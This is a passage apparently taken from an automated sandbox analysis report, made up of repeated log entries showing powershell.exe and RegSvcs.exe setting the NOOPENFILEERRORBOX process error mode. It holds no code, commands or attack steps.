                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
